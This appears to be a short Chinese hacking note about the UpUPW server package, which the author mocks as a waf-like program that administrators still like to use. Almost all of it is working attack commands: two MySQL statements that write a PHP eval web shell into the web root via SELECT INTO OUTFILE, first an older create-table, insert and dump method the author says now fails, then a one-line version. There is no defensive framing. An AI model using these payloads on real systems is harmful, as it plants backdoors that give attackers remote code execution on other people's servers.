废话:
upupw给我的感觉是一个充当了waf毁三观的垃圾程序。然而,我讨厌的程序,管理员都特别喜欢用。
你会发现直接用之前那套写shell的建表然后在值里添加shell代码写到一个路径不可以了。
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL ); INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>'); SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/exehack.php'; DROP TABLE IF EXISTS `darkmoon`;
直接可以使用:
select '<?php @eval($_POST[august])?>' into outfile 'D://upupw/XXX.php';